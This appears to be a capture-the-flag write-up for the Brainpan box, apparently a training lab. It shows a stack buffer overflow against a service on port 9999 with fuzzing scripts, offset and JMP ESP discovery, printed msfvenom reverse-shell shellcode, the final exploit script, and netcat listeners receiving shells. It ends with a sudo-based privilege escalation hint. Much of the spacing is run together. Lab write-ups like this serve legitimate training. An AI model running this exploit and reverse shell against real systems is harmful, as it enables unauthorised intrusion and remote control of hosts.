nmap-sC-sV10.10.222.251-oNnmap.outStartingNmap7.91 ( https://nmap.org ) at 2021-05-30 12:30 ISTNmapscanreportfor10.10.222.251Hostisup (0.16s latency).Notshown:998closedportsPORTSTATESERVICEVERSION9999/tcpopenabyss?|fingerprint-strings:|NULL:|_|_||_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_||_|_|_|_|_|_|_|_|_|_|_|_|_||_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|| [________________________ WELCOME TO BRAINPAN _________________________]|_ENTERTHEPASSWORD10000/tcpopenhttpSimpleHTTPServer0.6 (Python 2.7.3)|_http-server-header:SimpleHTTP/0.6Python/2.7.3|_http-title:Sitedoesn't have a title (text/html).1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=5/30%Time=60B33822%P=x86_64-pc-linux-gnu%r(NUSF:LL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\xSF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\xSF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\xSF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\xSF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\xSF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\xSF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\xSF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\xSF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\xSF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
The port 9999 is where the vulnerable exe file must be running. We can verify it by connecting using netcat:
nc10.10.222.2519999_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|[________________________ WELCOME TO BRAINPAN _________________________]ENTERTHEPASSWORD>>brainpanACCESSDENIED
#! /usr/bin/python3import socket, time, sysip ="LOCAL_IP"port =9999timeout =5payload =b'<PATTERN_GOES_HERE>'try: s = socket.socket() s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) s.send(payload)print("Fuzzing with {} bytes".format(len(payload))) s.recv(1024) s.close()except:print("Fuzzing crashed at {} bytes".format(len(payload)))exit()
EIP value = 35724134
Find the exact offset:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb-l1000-q35724134[*] Exact match at offset 524
Finding Bad characters
Generate all chars using python
Run the python script:
#! /usr/bin/python3import socket, time, sys, structip ="LOCAL_IP"port =9999timeout =5offset =524eip =b'B'*4allchars =b''.join([struct.pack('<B', x) for x inrange(1,256)])payload = [b'A'* offset, eip, allchars]payload =b''.join(payload)try: s = socket.socket() s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) s.send(payload)print("Fuzzing with {} bytes".format(len(payload) -len(eip) -len(allchars))) s.recv(1024) s.close()except:print("Fuzzing crashed at {} bytes".format(len(payload) -len(eip) -len(allchars)))exit()
There are no bad chars in brainpan (except \x00)
Finding right module
To find the modules: !mona modules
Only brainpan.exe has no memory protection.
To find JMP ESP within that module: !mona jmp -r esp -m brainpan.exe -cpb \x00
We have exactly one pointer which matches our location:
So, the EIP value must be set to 311712F3
We can verify this by setting a breakpoint in Immunity Debugger and running the following script:
#! /usr/bin/python3import socket, time, sys, structip ="LOCAL_IP"port =9999timeout =5offset =524eip =b''.join([struct.pack('<I', 0x311712F3)])payload = [b'A'* offset, eip,]payload =b''.join(payload)try: s = socket.socket() s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) s.send(payload)print("Fuzzing with {} bytes".format(len(payload) -len(eip))) s.recv(1024) s.close()except:print("Fuzzing crashed at {} bytes".format(len(payload) -len(eip)))exit()
Shell code & Shell access
All we got to do now is generate shell code:
msfvenom-pwindows/shell_reverse_tcpLHOST=tun0LPORT=1234EXITFUNC=thread-fpy-b"\x00"[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadFound11compatibleencodersAttemptingtoencodepayloadwith1iterationsofx86/shikata_ga_naix86/shikata_ga_naisucceededwithsize351 (iteration=0)x86/shikata_ga_naichosenwithfinalsize351Payloadsize:351bytesFinalsizeofpyfile:1712bytesbuf=b""buf+=b"\xb8\x46\x11\x18\x82\xda\xce\xd9\x74\x24\xf4\x5a\x31"buf+=b"\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x84\x15\xfa"buf+=b"\x77\xf4\xfe\x78\x77\x04\xff\x1c\xf1\xe1\xce\x1c\x65"buf+=b"\x62\x60\xad\xed\x26\x8d\x46\xa3\xd2\x06\x2a\x6c\xd5"buf+=b"\xaf\x81\x4a\xd8\x30\xb9\xaf\x7b\xb3\xc0\xe3\x5b\x8a"buf+=b"\x0a\xf6\x9a\xcb\x77\xfb\xce\x84\xfc\xae\xfe\xa1\x49"buf+=b"\x73\x75\xf9\x5c\xf3\x6a\x4a\x5e\xd2\x3d\xc0\x39\xf4"buf+=b"\xbc\x05\x32\xbd\xa6\x4a\x7f\x77\x5d\xb8\x0b\x86\xb7"buf+=b"\xf0\xf4\x25\xf6\x3c\x07\x37\x3f\xfa\xf8\x42\x49\xf8"buf+=b"\x85\x54\x8e\x82\x51\xd0\x14\x24\x11\x42\xf0\xd4\xf6"buf+=b"\x15\x73\xda\xb3\x52\xdb\xff\x42\xb6\x50\xfb\xcf\x39"buf+=b"\xb6\x8d\x94\x1d\x12\xd5\x4f\x3f\x03\xb3\x3e\x40\x53"buf+=b"\x1c\x9e\xe4\x18\xb1\xcb\x94\x43\xde\x38\x95\x7b\x1e"buf+=b"\x57\xae\x08\x2c\xf8\x04\x86\x1c\x71\x83\x51\x62\xa8"buf+=b"\x73\xcd\x9d\x53\x84\xc4\x59\x07\xd4\x7e\x4b\x28\xbf"buf+=b"\x7e\x74\xfd\x10\x2e\xda\xae\xd0\x9e\x9a\x1e\xb9\xf4"buf+=b"\x14\x40\xd9\xf7\xfe\xe9\x70\x02\x69\x1c\x94\x0b\x32"buf+=b"\x48\x94\x13\xc0\x5a\x11\xf5\xa2\x4a\x74\xae\x5a\xf2"buf+=b"\xdd\x24\xfa\xfb\xcb\x41\x3c\x77\xf8\xb6\xf3\x70\x75"buf+=b"\xa4\x64\x71\xc0\x96\x23\x8e\xfe\xbe\xa8\x1d\x65\x3e"buf+=b"\xa6\x3d\x32\x69\xef\xf0\x4b\xff\x1d\xaa\xe5\x1d\xdc"buf+=b"\x2a\xcd\xa5\x3b\x8f\xd0\x24\xc9\xab\xf6\x36\x17\x33"buf+=b"\xb3\x62\xc7\x62\x6d\xdc\xa1\xdc\xdf\xb6\x7b\xb2\x89"buf+=b"\x5e\xfd\xf8\x09\x18\x02\xd5\xff\xc4\xb3\x80\xb9\xfb"buf+=b"\x7c\x45\x4e\x84\x60\xf5\xb1\x5f\x21\x15\x50\x75\x5c"buf+=b"\xbe\xcd\x1c\xdd\xa3\xed\xcb\x22\xda\x6d\xf9\xda\x19"buf+=b"\x6d\x88\xdf\x66\x29\x61\x92\xf7\xdc\x85\x01\xf7\xf4"
Run the final Exploit:
#! /usr/bin/python3import socket, time, sys, structip ="LOCAL_IP"port =9999timeout =5offset =524eip =b''.join([struct.pack('<I', 0x311712F3)])nop_sled =b'\x90'*32buf =b""# Add full buf herepayload = [b'A'* offset, eip, nop_sled, buf]payload =b''.join(payload)try: s = socket.socket() s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) s.send(payload)print("Fuzzing with {} bytes".format(len(payload) -len(eip) -len(nop_sled) -len(buf))) s.recv(1024) s.close()except:print("Fuzzing crashed at {} bytes".format(len(payload) -len(eip) -len(nop_sled) -len(buf)))exit()
Don't forget to add NOP SLED in the final exploit!
Gain shell access using netcat:
$nc-lvnp1234listeningon [any] 1234 ...connectto [10.17.7.91] from (UNKNOWN) [LOCAL_IP] 49249MicrosoftWindows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Users\admin\Desktop\vulnerable-apps>whoamiwhoamioscp-bof-prep\admin
We have got the shell access for the local version only, we need to exploit the original server using this final exploit.
Gain initial access
Change the IP address and run the exploit again:
$nc-lvnp1234listeningon [any] 1234 ...connectto [10.17.7.91] from (UNKNOWN) [10.10.216.132] 40321CMDVersion1.4.1Z:\home\puck>echo%username%puck
But the commands seems to be alternating between windows and linux. So, I changed the payload to a linux shell: linux/x86/shell_reverse_tcp
Upgrade the shell using: python -c 'import pty; pty.spawn("/bin/bash")'
Checkout the binary which can be run without password:
puck@brainpan:/home/puck$sudo/home/anansi/bin/anansi_utilUsage:/home/anansi/bin/anansi_util [action]Where [action] is one of:-network-proclist-manual [command]
The man command can be exploited to gain root access (Check GTFO bins):